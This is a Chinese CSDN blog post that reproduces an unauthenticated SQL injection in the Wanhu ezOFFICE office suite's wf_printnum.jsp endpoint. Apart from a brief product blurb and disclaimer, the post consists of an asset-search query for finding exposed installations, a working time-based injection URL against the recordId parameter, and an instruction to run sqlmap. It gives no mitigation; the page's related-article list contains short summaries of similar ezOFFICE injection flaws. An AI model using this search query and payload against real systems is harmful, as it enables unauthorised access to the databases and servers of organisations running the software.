万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞

最新推荐文章于 2024-07-11 10:45:01 发布
最新推荐文章于 2024-07-11 10:45:01 发布
阅读量332 收藏
点赞数 10
文章标签: 安全 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/137375955
版权
本文报道了万户EZOFFICE办公软件中的SQL注入漏洞,攻击者可通过该漏洞获取数据库权限,可能进一步威胁服务器安全。开发者需注意强化安全措施以防止非法利用。
摘要由CSDN通过智能技术生成

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

万户EZOFFICE是一款办公软件,由中国万户网络科技有限公司开发和提供。该软件提供了一系列办公管理工具,包括文档管理、协作编辑、任务管理、日程安排、邮件通讯等功能,旨在提高团队的协作效率和工作效率

漏洞描述

万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限

资产搜索

app="万户ezOFFICE协同管理平台"

漏洞复现

http://127.0.0.1/defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27

sqlmap跑一下

cn_大腿
关注
  • 10
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
万户 ezOFFICE wf_process_attrelate_aiframe.jsp SQL注入漏洞
m0_50797689的博客
01-23 717
万户 ezOFFICE wf_process_attrelate_aiframe.jsp 未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。2、仅允许可信ip访问 /defaultroot/platform/bpm/work_flow/process/wf_process_attrelate_aiframe.jsp 此路由。OA ezoffice万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品。
万户 ezOFFICE wf_process_attrelate_aiframe.jsp SQL注入漏洞复现
0xSec
01-21 442
万户 ezOFFICEwf_process_attrelate_aiframe.jsp 存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
(1day)某户EZOFFICE wf_printnum.jspSQL注入漏洞(CVE-2024-1012)
onyourleft666的博客
02-02 491
Wanhu ezOFFICE 11.1.0中的一个严重漏洞被发现,该漏洞影响了文件defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp的某些未知处理过程。攻击者可以通过操纵参数recordId来进行SQL注入攻击。攻击可以远程启动。该漏洞已被公开披露,可能被利用。漏洞编号为CVE-2024-1012。
万户 ezOFFICE wf_printnum.jsp SQL注入漏洞复现
0xSec
01-19 404
万户 ezOFFICEwf_printnum.jsp 存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
漏洞复现】万户 ezOFFICE wf_printnum.jsp SQL注入漏洞
qq_67810151的博客
03-27 347
0x02 漏洞概述 万户 ezOFFICE wf_printnum.jsp 接口存在SQL注入漏洞,恶意攻击者可利用此漏洞获取数据库信息,获取服务器控制权限。
漏洞复现】万户ezOFFICE协同管理平台 wf_accessory_delete.jsp SQL注入漏洞
https://blog.echo234.cn/
04-03 355
万户ezOFFICE wf_accessory_delete.jsp接口存在SQL注入漏洞,恶意攻击者可利用此漏洞获取数据库信息,获取服务器控制权限。
漏洞复现】万户ezOFFICE协同管理平台 wf_printnum.jsp SQL注入漏洞
https://blog.echo234.cn/
04-03 573
万户ezOFFICE wf_printnum.jsp接口存在SQL注入漏洞,恶意攻击者可利用此漏洞获取数据库信息,获取服务器控制权限。
万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞 附POC
nnn2188185的博客
11-29 391
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用。
万户ezOFFICE数据字典
04-02
万户ezOFFICE数据字典
ezOFFICE协同管理平台使用手册_1.pdf
09-26
ezOFFICE协同管理平台使用手册_1.pdf
ezOFFICE安装手册(linux版).doc
11-30
"ezOFFICE安装手册(linux版)" ezOFFICE是基于Linux操作系统的办公自动化软件,在 Linux 平台上安装ezOFFICE需要遵循一定的步骤和要求。以下是ezOFFICE安装手册的详细说明: 安装前准备 在安装ezOFFICE之前,...
专题资料(2021-2022年)ezOFFICE协同管理平台使用手册1.doc
10-07
专题资料
移动互联安全扩展要求测评项
hakksjss的博客
07-10 824
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
网络设备安全
weixin_48579910的博客
07-11 574
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 947
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 344
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
富格林:曝光纠正安全交易误区
最新发布
fgl100的博客
07-11 301
因此,贵金属并非完全无风险,投资者仍需注意市场风险。投资者应该理解贵金属市场的复杂性,并将其视为投资组合的一部分,而不是绝对安全的避险资产。同时,通过合理的资产配置和风险管理策略,可以降低贵金属投资的风险。尽管黄金是最受欢迎的贵金属之一,但其他贵金属,如白银、铂金和钯金,同样具有投资潜力。忽视了其他贵金属的投资机会会导致投资组合的单一化,增加了风险。投资者应该考虑将不同类型的贵金属组合在其投资组合中,以实现更好的风险分散和收益潜力。通过选择不同贵金属之间的相关性较低的品种,可以降低整体投资组合的风险。
万户 ezoffice 文件上传漏洞复现
12-17
万户ezoffice是一个办公软件,用于处理各种办公文档。文件上传漏洞是指系统存在一个安全漏洞,允许攻击者在上传文件时注入恶意代码或者上传非法文件到服务器中。这个问题的产生可能是开发过程中没有充分考虑安全性,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值